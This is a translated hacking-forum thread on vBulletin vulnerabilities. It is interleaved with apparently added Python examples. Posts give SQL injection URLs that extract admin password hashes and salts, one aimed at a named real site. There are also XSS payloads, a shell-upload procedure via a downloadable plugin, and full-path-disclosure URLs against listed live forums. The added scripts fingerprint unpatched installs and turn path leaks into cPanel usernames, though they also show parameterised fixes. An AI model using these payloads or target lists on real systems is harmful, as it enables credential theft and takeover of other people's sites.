Forums [vBulletin vulnerability overview]

Discussion in 'CMS/forum vulnerabilities' started by bandera, 19 Aug 2006.

  1. Fooog (Elder - Старейшина)
    Usually (90% of the time) it says "Administration" in the bottom corner.
    Click there and you end up in the admin panel.
     
  2. eman (New Member)
    Let me correct you: "Management".

    Maybe they simply removed the footer for security reasons.. otherwise, go to a user's profile -> edit, and the admin panel will open (if it is set in config.php), or try to issue an infraction and the mod panel will open.. (only I don't know whether you can get any further from the mod panel)
     
  3. Cherep (New Member)
    As I understand it, it is not set in the config :( Maybe they deleted the damn thing altogether
     
  4. -morfiy- (New Member)
    log in under the admin account, wait for the admin and look at the admin panel path through "Who's online"
     
  5. eman (New Member)
    vBulletin 4.1.10 Full Path Disclosure

    [Info]
    # Author: linc0ln.dll
    # Exploit Title: vBulletin 4.1.10 Full Path Disclosure
    # Date: 16/01/2012
    # Vendor or Software Link: http://www.vbulletin.com/
    # Category: WebApp
    # Version: 4.1.10
    # Contact: [email protected]
    # Website: linc6.wordpress.com
    # Greetings to: Mario_Vs | fir3 | fight3r | artii2 | pok3 | Upgreydd |VoltroN | amiugly | b00y4k4 |
    [Vulnerability]

    # Full Path Disclosure:

    demo
     
  6. M_script (Members of Antichat)
    It says right there: "Full Path Disclosure". Disclosure of the script's path on the server.
     
  7. OxoTnik (На мышей)
    Stored (active) XSS

    All versions are vulnerable

    Moderator rights required

    Go to
    Moderator panel -> Forum management -> Announcement [Edit]

    Working example (check that it works)
    Exploitation is the usual

     
  8. banned (Banned)
    You've discovered America. That's not XSS, it's a feature. It works on achat too.
     
  9. yarbabin (HACKIN YO KUT)
    if the admin went into admincp earlier, the cookies will contain the admin panel session, though they don't live long.
     
    #129 yarbabin, 16 Mar 2012
    Last edited by a moderator: 25 Oct 2014
  10. Ereee (Elder - Старейшина)
    4.1.4 also has an SQL injection. Look at the Patchlevel in vbulletin_global.js. If it just says "Vbulletin 4.1.4", rejoice. If "Patchlevel n" is written next to it, you can look for other ways in.
     
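Fingerprinting the patch level the way the post above describes, as an added example that is not code from the thread or from vBulletin: the script parses the banner comment that vBulletin puts at the top of its PHP and JS files and reports the version and patch level. The fetch path (clientscript/vbulletin_global.js), the banner layout, and the rule that any "Patch Level n" means the release has been patched are assumptions taken from the post and from memory of the 3.x/4.x sources; the two sample banners are constructed, not copied from a real file.

```python
"""Added example (not from the thread): read version and patch level from the
banner comment at the top of clientscript/vbulletin_global.js."""
import re

# Constructed samples of the banner (layout assumed; check against a real copy).
SAMPLE_UNPATCHED = (
    "/*======================================================================*\\\n"
    "|| #################################################################### ||\n"
    "|| # vBulletin 4.1.4\n"
    "|| # ---------------------------------------------------------------- # ||\n"
)
SAMPLE_PATCHED = SAMPLE_UNPATCHED.replace("vBulletin 4.1.4", "vBulletin 4.1.4 Patch Level 2")
SAMPLE_NO_BANNER = "var vb_disable_ajax = 0;\n"  # constructed: banner stripped by the site

# "vBulletin 4.1.4" optionally followed by "Patch Level 2" on the same line.
BANNER_RE = re.compile(
    r"vBulletin\s+(?P<ver>\d+(?:\.\d+)+)(?:[ \t]+Patch\s*Level\s+(?P<pl>\d+))?",
    re.I,
)


def parse_banner(js_text):
    """Return ((major, minor, ...), patch_level) or None when no banner is present.

    A banner with no "Patch Level" part reports patch level 0.
    """
    m = BANNER_RE.search(js_text)
    if not m:
        return None
    version = tuple(int(part) for part in m.group("ver").split("."))
    patch = int(m.group("pl")) if m.group("pl") else 0
    return version, patch


def worth_trying(js_text, affected=(4, 1, 4)):
    """True when the banner names the affected release with no patch level at all,
    which is the condition the post says to look for before trying the injection."""
    parsed = parse_banner(js_text)
    return parsed is not None and parsed[0] == affected and parsed[1] == 0


if __name__ == "__main__":
    for label, text in (("unpatched", SAMPLE_UNPATCHED), ("patched", SAMPLE_PATCHED),
                        ("no banner", SAMPLE_NO_BANNER)):
        print(f"{label}: {parse_banner(text)} -> worth trying: {worth_trying(text)}")
```

Against a live target the same function is fed the body of GET /clientscript/vbulletin_global.js; sites that minify or strip the banner return None, in which case fall back to other fingerprints rather than assuming the version.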
  11. pharm_all (Member)
    vBulletin 4.1.7 => 4.1.10 XSS Vulnerability

    Vulnerability:
    1. Send New Private Message > Message text > %22%3E%3Cscript%3Ealert('XSS')%3C/script%3E (encode script UTF-8)

    Watch the video: [http://vimeo.com/39049790]

    1337day.com/exploits/17824
     
  12. Ereee (Elder - Старейшина)
    The WAF is in the way. Try to bypass it.
     
    #132 Ereee, 29 Mar 2012
    Last edited by a moderator: 25 Oct 2014
  13. stan0009 (Member)
    Sure, no problem
    Here we go
    EasyPage SQL-Injection

    Google Dork: intext:"vbulletin" inurl:"page.php?p=" [Result: 18 000]

    File: /page.php
    PHP:
    [...]
    $pageid = $_REQUEST['p'];   // taken raw, never escaped
    [...]

    $page = $vbulletin->db->query_first("
        SELECT *
        FROM " . TABLE_PREFIX . "easy_pages
        WHERE varname = '$pageid'
        LIMIT 1
    ");
    [...]
    PoC:
    Code:
    http://stavropolregion.com/page.php?p=stavrop%27%20and%201=2%20union%20select%201,2,3,%28select+concat_ws%280x3b,username,password,salt%29+from+user+where+usergroupid=6%20limit%201%29,5%20--%20f
    File: /admincp/easy_pages_admin.php
    PHP:
    [...]
    if ($_REQUEST['do'] == 'edit')
    {
        $pageid = $_REQUEST['pageid'];   // raw, used unquoted below

        $page = $db->query_first("
            SELECT *
            FROM " . TABLE_PREFIX . "easy_pages
            WHERE pageid = $pageid
            LIMIT 1
        ");
    [...]
    PHP:
    [...]
    if ($_REQUEST['do'] == 'edit_update')
    {
        $title   = addslashes($_POST['title']);
        $varname = addslashes($_POST['varname']);
        $content = addslashes($_POST['content']);

        // table_wrap and pageid are not escaped at all
        $vbulletin->db->query_write("UPDATE " . TABLE_PREFIX . "easy_pages
            SET title = '$title',
                varname = '$varname',
                content = '$content',
                table_wrap = '" . $_POST['table_wrap'] . "'
            WHERE pageid = " . $_POST['pageid'] . ";
        ");

        print_cp_redirect('easy_pages_admin.php');
    }
    [...]
    PHP:
    [...]
    if ($_REQUEST['do'] == 'add_update')
    {
        $title   = addslashes($_POST['title']);
        $content = addslashes($_POST['content']);
        $varname = addslashes($_POST['varname']);

        // table_wrap is not escaped
        $vbulletin->db->query_write("INSERT INTO " . TABLE_PREFIX . "easy_pages
            SET title = '$title',
                varname = '$varname',
                content = '$content',
                table_wrap = '" . $_POST['table_wrap'] . "'
        ");

        print_cp_redirect('easy_pages_admin.php');
    }
    [...]
    PHP:
    [...]
    if ($_REQUEST['do'] == 'delete_page')
    {
        // pageid is not escaped
        $vbulletin->db->query_write("DELETE FROM " . TABLE_PREFIX . "easy_pages WHERE pageid = '" . $_REQUEST['pageid'] . "' LIMIT 1");

        print_cp_redirect('easy_pages_admin.php');
    }
    [...]
    Successfully found by
    (c) Boolean, 0x0000ed.com, 2012.
    Successfully taken from
    (c) Grabberz.com
     
  14. In_flames (New Member)
    vBulletin 3.8.x

    PHP:
    $ibforums->input['s_id'] = ibp_cleansql( $ibforums->input['s_id'] );
    Path disclosure

     
  15. Export (Member)
    Path disclosure in the latest version (4.2.0)
    At least moderator rights are required.
    Code:
    http://localhost/modcp/index.php?do[]=head
    https://localhost/modcp/index.php?do[]=home
     
  16. Br@!ns (Elder - Старейшина)
    Shell upload in 4.0.7, give or take
    Admin panel access required.

    Code:
    Go into the admin panel
    Plugins & Products -> Download / Upload Plugins
    Choose the shell plugin (attached below).
    Install it.
    Go to Paid Subscriptions -> Subscription Manager
    
    http://www.sendspace.com/file/rz0609
     
  17. VY_CMa (Green member)
    Exp.
    Code:
    http://target.com/includes/blog_plugin_useradmin.php?do=usercss&u=[Sql]
     
  18. eman (New Member)
    vBulletin ChangUonDyU Advanced Statistics SQL Injection Vulnerability

    # Exploit Title: vBulletin ChangUonDyU Advanced Statistics - SQL Injection Vulnerability
    # Google Dork: No Dork
    # Date: 19/10/2012
    # Exploit Author: Juno_okyo
    # Vendor Homepage: http://hoiquantinhoc.com
    # Software Link:
    http://hoiquantinhoc.com/modifications-3-8-x/4468-changuondyu-advanced-statistics-6-0-1-a.html
    # Version: vBulletin 3 & 4
    # Tested on: Windows 7
    # CVE : http://www.vbulletin.com/
    #
    ##############################################################################################
    Vulnerability:
    ##############################################################################################

    SQL Injection was found in ChangUonDyU Advanced Statistics.

    Query on ajax.php

    ##############################################################################################
    Exploitation:
    ##############################################################################################

    ajax.php?do=inforum&listforumid=100) UNION SELECT 1,concat_ws(0x7c,user(),database(),version()),3,4,5,6,7,8,9,10-- -&result=20

    or:

    ajax.php?do=inforum&listforumid=100) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,username,password,salt),8,9,10,11 from user where userid=1-- -&result=20

    ##############################################################################################
    Ex:
    ##############################################################################################

    http://server/f/ajax.php?do=inforum&listforumid=100%29%20UNION%20SELECT%201,concat_ws%280x7c,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10--%20-&result=20


    ##############################################################################################
    More Details:
    ##############################################################################################

    Website: http://junookyo.blogspot.com/
    About Exploit:
    http://junookyo.blogspot.com/2012/10/vbb-changuondyu-advanced-statistics-sql.html

    ##############################################################################################
    Great thanks to James, Juno_okyo & J2TeaM, VNHack Group
    ##############################################################################################
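The EasyPage injection in post 13 and the ChangUonDyU one in this post are the same class of bug: user input is pasted into the SQL text, once inside a quoted string (`varname = '$pageid'`), once in a numeric context (`pageid = $pageid`, or the IN(...) list that the `100)` prefix above closes). The script below is an added example, not code from the thread, from vBulletin or from either plugin: it rebuilds the two vulnerable lookups on an in-memory SQLite database, runs the thread's PoC payload through them, and shows the same lookups done with bound parameters. The `easy_pages` and `user` tables, their rows, the `usergroupid = 6` admin group and `TABLE_PREFIX = ""` are constructed for the demo; `concat_ws(0x3b, ...)` from the PoC is rewritten as `||` because SQLite, not MySQL, runs here.

```python
"""Added example (not from the thread): UNION injection vs. bound parameters,
rebuilt on SQLite with constructed tables and rows."""
import sqlite3

TABLE_PREFIX = ""  # constructed: demo tables carry no prefix

# Constructed demo data. easy_pages has five columns, which is why the thread's
# payload reads "union select 1,2,3,(...),5". usergroupid 6 is the admin group.
SCHEMA = """
CREATE TABLE easy_pages (pageid INTEGER PRIMARY KEY, title TEXT, varname TEXT,
                         content TEXT, table_wrap TEXT);
INSERT INTO easy_pages VALUES (1, 'About us', 'about', 'Hello', '1');
INSERT INTO easy_pages VALUES (2, 'Rules', 'rules', 'Be nice', '0');
CREATE TABLE user (userid INTEGER PRIMARY KEY, username TEXT, password TEXT,
                   salt TEXT, usergroupid INTEGER);
INSERT INTO user VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99', 'aB3', 6);
INSERT INTO user VALUES (2, 'bob', 'd41d8cd98f00b204e9800998ecf8427e', 'Zz9', 2);
"""

# The page.php PoC from the thread, URL-decoded, with concat_ws(0x3b, ...)
# rewritten using SQLite's || operator. "-- f" comments out the "' LIMIT 1"
# that the script appends after the injected value.
STRING_PAYLOAD = (
    "stavrop' and 1=2 union select 1,2,3,"
    "(select username||';'||password||';'||salt from user where usergroupid=6 limit 1),5 -- f"
)
# Same idea for do=edit, where pageid is interpolated without quotes: nothing
# to break out of, the UNION simply follows the number.
NUMERIC_PAYLOAD = (
    "0 union select 1,2,3,"
    "(select username||';'||password||';'||salt from user where usergroupid=6),5"
)


def open_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def lookup_page_vulnerable(con, p):
    """page.php as posted: $_REQUEST['p'] dropped straight into the SQL string."""
    sql = f"SELECT * FROM {TABLE_PREFIX}easy_pages WHERE varname = '{p}' LIMIT 1"
    return con.execute(sql).fetchone()


def edit_page_vulnerable(con, pageid):
    """easy_pages_admin.php do=edit: unquoted numeric context, same flaw."""
    sql = f"SELECT * FROM {TABLE_PREFIX}easy_pages WHERE pageid = {pageid} LIMIT 1"
    return con.execute(sql).fetchone()


def lookup_page_safe(con, p):
    """Bound parameter: the payload is compared as a literal varname and matches nothing."""
    sql = f"SELECT * FROM {TABLE_PREFIX}easy_pages WHERE varname = ? LIMIT 1"
    return con.execute(sql, (p,)).fetchone()


def edit_page_safe(con, pageid):
    """Coerce to int first (PHP's intval()), then bind; non-numeric input is rejected."""
    try:
        pid = int(pageid)
    except (TypeError, ValueError):
        return None
    sql = f"SELECT * FROM {TABLE_PREFIX}easy_pages WHERE pageid = ? LIMIT 1"
    return con.execute(sql, (pid,)).fetchone()


def demo():
    """Run both payloads through the vulnerable and the fixed lookups."""
    con = open_db()
    return {
        "string_ctx_vulnerable": lookup_page_vulnerable(con, STRING_PAYLOAD),
        "string_ctx_safe": lookup_page_safe(con, STRING_PAYLOAD),
        "numeric_ctx_vulnerable": edit_page_vulnerable(con, NUMERIC_PAYLOAD),
        "numeric_ctx_safe": edit_page_safe(con, NUMERIC_PAYLOAD),
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(f"{name}: {row}")
```

The vulnerable lookups hand back `admin;<hash>;<salt>` in the fourth column; the bound versions return nothing for the payloads and the right page for a normal varname or id. In the PHP from post 13 the equivalent fix is `intval()` on `pageid` and `$vbulletin->db->escape_string()` (or `$vbulletin->input->clean_gpc('r', 'p', TYPE_STR)`) on `p`; `addslashes()` on three fields while `table_wrap` and `pageid` stay raw, as in `edit_update`, leaves the query injectable.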
     
  19. n0n@me (New Member)
    vBulletin 4.2.0 Full Path Disclosure Vulnerability

    Code:
    The Full Path Disclosure is in vBulletin 4.2.0, in forumrunner. With Full Path Disclosure you can get the path to the forum you're in and also (most of the time it is the same) the cPanel username.
    To see it go to:   http://[path]/forumrunner/include/album.php
    It works in 90% of the forums.

    Example:
    http://www.mgcproducts.com/forumrunner/include/album.php
    http://atheistdiscussion.com/forumrunner/include/album.php
    http://apolyton.net/forumrunner/include/album.php
    http://www.romaniancommunity.net/forumrunner/include/album.php
    http://www.ghosthax.com/forumrunner/include/album.php
    http://www.reddotcity.net/forumrunner/include/album.php
    http://www.sevenskins.com/forum/forumrunner/include/album.php
    http://www.purevb.com/forumrunner/include/album.php
    http://forum.hackersbrasil.com.br/forumrunner/include/album.php
    vBulletin 4.x/5.x multiple Full Path Disclosure Vuln

    Code:
    /includes/api/commonwhitelist_2.php 
    /includes/api/commonwhitelist_5.php 
    /includes/api/commonwhitelist_6.php 
    /includes/api/1/album_album.php 
    /includes/api/1/album_editalbum.php 
    /includes/api/1/album_latest.php 
    /includes/api/1/album_overview.php 
    /includes/api/1/album_picture.php 
    /includes/api/1/album_user.php 
    /includes/api/1/announcement_edit.php 
    /includes/api/1/announcement_view.php 
    /includes/api/1/api_cmscategorylist.php 
    /includes/api/1/api_cmssectionlist.php 
    /includes/api/1/api_forumlist.php 
    /includes/api/1/api_getnewtop.php 
    /includes/api/1/api_getsecuritytoken.php 
    /includes/api/1/api_getsessionhash.php 
    /includes/api/1/api_init.php 
    /includes/api/1/api_mobilepublisher.php 
    /includes/api/1/api_usersearch.php 
    /includes/api/1/blog_blog.php 
    /includes/api/1/blog_bloglist.php 
    /includes/api/1/blog_comments.php 
    /includes/api/1/blog_custompage.php 
    /includes/api/1/blog_dosendtofriend.php 
    /includes/api/1/blog_list.php 
    /includes/api/1/blog_members.php 
    /includes/api/1/blog_post_comment.php 
    /includes/api/1/blog_post_editblog.php 
    /includes/api/1/blog_post_editcomment.php 
    /includes/api/1/blog_post_edittrackback.php 
    /includes/api/1/blog_post_newblog.php 
    /includes/api/1/blog_post_postcomment.php 
    /includes/api/1/blog_post_updateblog.php 
    /includes/api/1/blog_sendtofriend.php 
    /includes/api/1/blog_subscription_entrylist.php 
    /includes/api/1/blog_subscription_userlist.php 
    /includes/api/1/blog_usercp_addcat.php 
    /includes/api/1/blog_usercp_editcat.php 
    /includes/api/1/blog_usercp_editoptions.php 
    /includes/api/1/blog_usercp_editprofile.php 
    /includes/api/1/blog_usercp_modifycat.php 
    /includes/api/1/blog_usercp_updateprofile.php 
    /includes/api/1/editpost_editpost.php 
    /includes/api/1/editpost_updatepost.php 
    /includes/api/1/forum.php 
    /includes/api/1/forumdisplay.php 
    /includes/api/1/inlinemod_domergeposts.php 
    /includes/api/1/list.php 
    /includes/api/1/login_lostpw.php 
    /includes/api/1/member.php 
    /includes/api/1/memberlist_search.php 
    /includes/api/1/misc_showattachments.php 
    /includes/api/1/misc_whoposted.php 
    /includes/api/1/newreply_newreply.php 
    /includes/api/1/newreply_postreply.php 
    /includes/api/1/newthread_postthread.php 
    /includes/api/1/newthread_newthread.php 
    /includes/api/1/poll_newpoll.php 
    /includes/api/1/poll_polledit.php 
    /includes/api/1/poll_showresults.php 
    /includes/api/1/private_editfolders.php
    /includes/api/1/private_insertpm.php 
    /includes/api/1/private_messagelist.php 
    /includes/api/1/private_newpm.php 
    /includes/api/1/private_showpm.php 
    /includes/api/1/private_trackpm.php 
    /includes/api/1/profile_editattachments.php 
    /includes/api/1/profile_editoptions.php 
    /includes/api/1/profile_editprofile.php 
    /includes/api/1/register_addmember.php 
    /includes/api/1/register_checkdate.php 
    /includes/api/1/search_process.php 
    /includes/api/1/search_showresults.php 
    /includes/api/1/showthread.php 
    /includes/api/1/subscription_addsubscription.php 
    /includes/api/1/subscription_editfolders.php 
    /includes/api/1/subscription_viewsubscription.php 
    /includes/api/1/threadtag_managetags.php 
    /includes/api/2/album_picture.php 
    /includes/api/2/api_blogcategorylist.php 
    /includes/api/2/blog_blog.php 
    /includes/api/2/blog_bloglist.php 
    /includes/api/2/blog_list.php 
    /includes/api/2/blog_subscription_entrylist.php 
    /includes/api/2/blog_subscription_userlist.php 
    /includes/api/2/blog_usercp_groups.php 
    /includes/api/2/content.php 
    /includes/api/2/editpost_editpost.php 
    /includes/api/2/forumdisplay.php 
    /includes/api/2/member.php 
    /includes/api/2/newreply_newreply.php 
    /includes/api/2/forum.php 
    /includes/api/2/poll_newpoll.php 
    /includes/api/2/poll_polledit.php 
    /includes/api/2/poll_showresults.php 
    /includes/api/2/private_messagelist.php 
    /includes/api/2/private_trackpm.php 
    /includes/api/2/profile_editattachments.php 
    /includes/api/2/search_showresults.php 
    /includes/api/2/showthread.php 
    /includes/api/3/api_gotonewpost.php 
    /includes/api/4/album_user.php 
    /includes/api/4/api_forumlist.php 
    /includes/api/4/api_getnewtop.php 
    /includes/api/4/breadcrumbs_create.php 
    /includes/api/4/facebook_getforumid.php 
    /includes/api/4/facebook_getnewforummembers.php 
    /includes/api/4/get_vbfromfacebook.php 
    /includes/api/4/login_facebook.php 
    /includes/api/4/newreply_postreply.php 
    /includes/api/4/newthread_postthread.php 
    /includes/api/4/register.php 
    /includes/api/4/register_addmember.php 
    /includes/api/4/search_findusers.php 
    /includes/api/4/subscription_viewsubscription.php 
    /includes/api/5/api_init.php 
    /includes/api/6/api_getnewtop.php 
    /includes/api/6/api_gotonewpost.php 
    /includes/api/6/content.php 
    /includes/api/6/member.php 
    /includes/api/6/newthread_newthread.php 
    /includes/block/blogentries.php 
    /includes/block/cmsarticles.php 
    /includes/block/html.php 
    /includes/block/newposts.php 
    /includes/block/sgdiscussions.php 
    /includes/block/tagcloud.php 
    /includes/block/threads.php 
    /forumrunner/include/subscriptions.php 
    /forumrunner/include/search_forum.php 
    /forumrunner/include/profile.php 
    /forumrunner/include/post.php 
    /forumrunner/include/pms.php 
    /forumrunner/include/online.php 
    /forumrunner/include/moderation.php 
    /forumrunner/include/misc.php 
    /forumrunner/include/login.php 
    /forumrunner/include/get_thread.php 
    /forumrunner/include/get_forum.php 
    /forumrunner/include/cms.php 
    /forumrunner/include/attach.php 
    /forumrunner/include/announcement.php 
    /forumrunner/include/album.php 
    /forumrunner/support/vbulletin_methods.php 
    /forumrunner/support/stringparser_bbcode.class.php 
    /forumrunner/support/utils.php 
    /forumrunner/support/other_methods.php 
    /packages/skimlinks/hooks/postbit_display_complete.php 
    /packages/skimlinks/hooks/showthread_complete.php 
    /packages/skimlinks/hooks/userdata_start.php 
    
    //...Leaked bY beBoss..//
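Turning a path-disclosure response into something usable, as an added example that is not code from the thread: the moderator-only `do[]=head` trick in post 15 and the direct hits on `forumrunner/include/*.php` or `includes/api/*/*.php` above all work because PHP, with `display_errors` on, prints `<level>: <message> in /absolute/path/file.php on line N`. The script strips the `<b>`/`<br />` tags PHP wraps around that line, pulls out the absolute path, and derives what the post calls the cPanel username (the `/home/<user>/public_html` convention, a heuristic that only holds on cPanel-style hosts) plus the document root. The two response bodies are constructed samples in PHP's default html_errors layout, not captured from any site, and the hostnames and account names in them are made up.

```python
"""Added example (not from the thread): parse PHP error lines out of an HTTP
response body and recover the disclosed path, document root and home account."""
import re
from html import unescape

# Standard PHP error line once HTML tags are stripped:
#   "<level>: <message> in <absolute path>.php on line <n>"
PHP_ERROR_RE = re.compile(
    r"(?P<level>Fatal error|Parse error|Warning|Notice|Deprecated)\s*:\s*"
    r"(?P<msg>.+?)\s+in\s+(?P<path>(?:/|[A-Za-z]:[\\/])\S+?\.php)\s+on\s+line\s+(?P<line>\d+)",
    re.S,
)

# Constructed samples (not captured from a real forum) in PHP's html_errors=On layout.
SAMPLE_DIRECT_INCLUDE = (
    "<br />\n<b>Fatal error</b>:  Call to a member function query_first() on a non-object "
    "in <b>/home/forumacct/public_html/forumrunner/include/album.php</b> on line <b>12</b><br />\n"
)
SAMPLE_ARRAY_PARAM = (
    "<br />\n<b>Warning</b>:  strtolower() expects parameter 1 to be string, array given "
    "in <b>/var/www/vhosts/forum.example/httpdocs/modcp/index.php</b> on line <b>85</b><br />\n"
)
SAMPLE_CLEAN = "<html><body>Nothing to see here.</body></html>"


def strip_html(body):
    """Drop tags and decode entities so the regex sees the bare error text."""
    return unescape(re.sub(r"<[^>]+>", "", body))


def extract_disclosures(body, requested_path=None):
    """Return one dict per PHP error line found in the response body.

    requested_path is the URL path that was requested, e.g. "/modcp/index.php";
    when the disclosed filesystem path ends with it, the rest is the document root.
    """
    found = []
    for m in PHP_ERROR_RE.finditer(strip_html(body)):
        path = m.group("path").replace("\\", "/")
        home = re.match(r"^/home/([^/]+)/public_html(?:/|$)", path)  # cPanel layout heuristic
        docroot = None
        if requested_path and path.endswith(requested_path):
            docroot = path[: -len(requested_path)] or "/"
        found.append({
            "level": m.group("level"),
            "message": m.group("msg").strip(),
            "path": path,
            "line": int(m.group("line")),
            "cpanel_user": home.group(1) if home else None,
            "docroot": docroot,
        })
    return found


if __name__ == "__main__":
    for body, req in ((SAMPLE_DIRECT_INCLUDE, "/forumrunner/include/album.php"),
                      (SAMPLE_ARRAY_PARAM, "/modcp/index.php"),
                      (SAMPLE_CLEAN, "/")):
        print(extract_disclosures(body, req))
```

The same parser covers the `?do[]=head` case from post 15, where passing an array instead of a string makes a string function emit a Warning with the full path. On the defending side, `display_errors = Off` in php.ini (with `log_errors = On`) makes every entry in the file list above return a blank page instead of a path.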
     
  20. BigBear (Staff Member, Гарант - Escrow Service)
    I've run into this nonsense. I got around it by switching the plugin to one of the index hooks that fires on entering the forum, and as the PHP code I put not receiving commands via GPC but copying a file from a remote host into the needed folder.
     